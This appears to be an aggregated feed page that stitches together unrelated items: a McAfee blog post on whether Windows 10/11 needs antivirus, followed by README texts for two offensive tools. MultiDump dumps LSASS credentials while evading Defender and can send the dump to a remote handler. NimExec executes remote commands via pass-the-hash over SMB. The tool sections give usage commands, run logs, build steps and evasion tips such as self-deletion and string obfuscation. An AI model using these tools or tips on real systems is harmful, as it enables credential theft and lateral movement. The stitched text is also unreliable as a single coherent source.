Login
If your PC runs on Windows 10, you’re in very good company. The Microsoft operating system is the most widely used OS in the world.
However, the rollout to Windows 11 began in 2021, with Windows 10’s support lifecycle ending on October 14, 2025. After this date, Microsoft will stop providing free security updates, technical support, or software updates for Windows 10. If you are a Windows 10 user, this means you will need to upgrade to the newer OS or purchase extended security updates to continue using the old OS securely.
Unfortunately, its success as a widely used operating system makes Windows attractive to hackers. If malicious software could make a home in Windows, a lot of targets would ask how best to protect your Windows 10 or 11 device. Should you just use Windows Security — Microsoft’s free version of antivirus software — or buy additional protection?
Read on to learn what Microsoft Security covers and how additional virus protection can secure all of your connected devices.
Windows Defender is a free antivirus tool that’s built into the Windows operating system. Initially released as an anti-spyware program for Windows XP and Windows Server 2003, it became a full antivirus program with Windows 8 in 2012.
Today, Windows Defender antivirus is part of the Windows Security suite, which offers a comprehensive solution that includes Windows Firewall and Smart App Control for real-time protection against threats. While it’s considered one of the best free antivirus software programs, Windows Defender doesn’t have any extra features that might come with paid security software. If you’re just looking for good antivirus software, it can get the job done.
If you’re not using third-party antivirus protection, you’ll want to make sure that your Windows Defender antivirus coverage is working on your computer. Here’s how to check:
To make sure your Windows Security is running, follow these steps:
Windows Defender is a convenient and cost-effective way to protect your Microsoft device from viruses. With features like real-time protection, firewall integration, and cloud-based threat detection, it provides a solid baseline of security for your computer. This overview explores what Windows Defender does well and where it falls short:
While Windows Defender has vastly improved, it still has some limitations compared to other comprehensive security and antivirus suites.
While Windows Security and Windows Defender offer robust baseline malware protection, modern digital threats go far beyond simple viruses. To stay truly safe, you need to look at the bigger picture of online security. This is where a comprehensive security suite offers significant advantages over a standalone antivirus tool.
Here’s a quick comparison between the built-in Windows Defender and what a full-featured security suite offers:
| Feature | Windows Defender | Comprehensive Suites |
| Antivirus & malware protection | Yes (strong baseline) | Yes (advanced) |
| Firewall | Yes | Yes (advanced, customizable) |
| Secure VPN | No | Yes |
| Identity monitoring | No | Yes |
| Cross-device protection (Mac, Android, iOS) | No | Yes |
| Password manager | Limited (browser-based) | Yes (secure, cross-device) |
| Web protection | Yes (Edge browser) | Yes (all browsers) |
Cybercriminals constantly develop new malware, sophisticated phishing scams, elaborate ruses and zero-day exploits that target your behavior—like tricking you into clicking a malicious link, downloading a compromised file, or giving your personal information such as your bank and credit card numbers. Some scams even target your devices with risky apps or links on social media.
As thousands of new threat variants are discovered daily, having dedicated and up-to-date virus protection for Windows 11 is essential for comprehensive security. Ultimately, you don’t need to disable Windows Defender’s firewall, but adding a comprehensive security suite provides crucial layers of protection against phishing, identity theft, and unsecured Wi-Fi that are essential for staying safe online today. Having another antivirus program can make sure you have real-time protection and access to the latest security features. Better to be safe than sorry!
From Windows 10, the upgraded Windows 11 introduces significant security enhancements, thanks to a more robust security architecture that applies stricter hardware requirements. Mandatory features such as Trusted Platform Module (TPM) 2.0, Virtualization-Based Security (VBS), and Secure Boot create a much stronger “secure-by-default” defense against attacks that target the boot process and system integrity.
However, this enhanced baseline security does not eliminate the need for more diligent protection. The vast majority of cyberattacks target the user, not the hardware. Cybercriminals still employ phishing emails, malicious downloads, and insecure websites to compromise your device, regardless of the operating system’s strength. While it’s true that Windows 11 has made great strides in security, the threat landscape has evolved even faster. Installing a multi-layered security solution remains a critical tool for proactively protecting your personal data and online activities.
In Windows 11, you can augment the built-in Windows Defender with a free antivirus option, but it’s important to understand the trade-offs. Free antivirus solutions typically offer only basic malware protection and lack crucial features that are standard in paid suites, such as a secure VPN, identity monitoring services, advanced phishing protection, a password manager, and dedicated customer support. Some free software may also collect and sell your browsing data to third parties to generate revenue.
While free is tempting, investing in a paid suite with total protection provides peace of mind, knowing that all aspects of your digital life—from your device security to your personal identity and online privacy—are actively protected by an integrated, powerful solution.
Using Microsoft’s built-in antivirus software can protect your Windows devices from viruses and malware. Follow these basic Windows Defender management steps:
In most cases, you can retain your third-party antivirus when you move to Windows 11. Reputable antivirus providers ensure their software is fully compatible with new operating system releases. Before you upgrade to Windows 11, ensure your antivirus software is updated to the latest version. Your subscription should carry over to the new OS seamlessly.
The benefit of using a cross-platform security suite is that your license and protection extend beyond a single OS version. Whether you’re on Windows 10, Windows 11, a Mac, or a mobile device, your protection remains active and managed from a single account, avoiding the hassle of finding new software or purchasing new licenses every time you upgrade or change devices.
Windows Defender provides a solid starting point of security for your computer, but it is good to reinforce that capability with a comprehensive solution. Antivirus protection programs available in the market today aren’t all created equal. When looking for the best antivirus software for your needs, here are some things to consider for your devices running on Windows 11.
Today’s cybercriminals are relentlessly creating new threats every day to steal your identity, money, and personal data. Thinking of antivirus as just for viruses is outdated; modern security suites are about total digital wellness. McAfee+ was developed with an understanding of how cybercriminals operate. Our all-in-one protection includes:
Whether you’re using Windows 10 or the latest Windows 11, the built-in Microsoft Defender provides a good starting point for your device’s security. However, an antivirus is just one layer of security. To be truly protected from the full spectrum of today’s online threats, you need a more comprehensive approach. Adding a trusted security suite gains you layers of protection for your identity, privacy, and data that go far beyond basic antivirus defense.
When you install a third-party antivirus like McAfee Total Protection, it seamlessly takes over as the primary real-time protection provider, while Windows Defender can remain available for periodic scans, ensuring there are no conflicts. To check your security status, simply navigate to Windows Security > Virus & threat protection to see which provider is active.
For complete peace of mind, comprehensive solutions like McAfee Total Protection add critical features like a VPN for online privacy, identity monitoring, and protection for all your devices, not just your Windows personal computer.
The post Does Windows 10 or 11 Need Antivirus Software? appeared first on McAfee Blog.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
FreshRSS __ __ _ _ _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|
Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]
-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode
MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]
Handler for RemoteProcDump
options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.
The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.
By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.
MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
Open in Visual Studio, build in Release mode.
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.
Self deletion can be toggled by uncommenting the following line in Common.h:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/
Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.
NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.
Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.
This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.
nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim
The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.
Also, you can install the required Nim modules via Nimble with the following command:
nimble install ptr_math nimcrypto hostname
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v
_..._
.-'_..._''.
_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'
@R0h1rr1m
[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!
It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.
-v | --verbose Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.
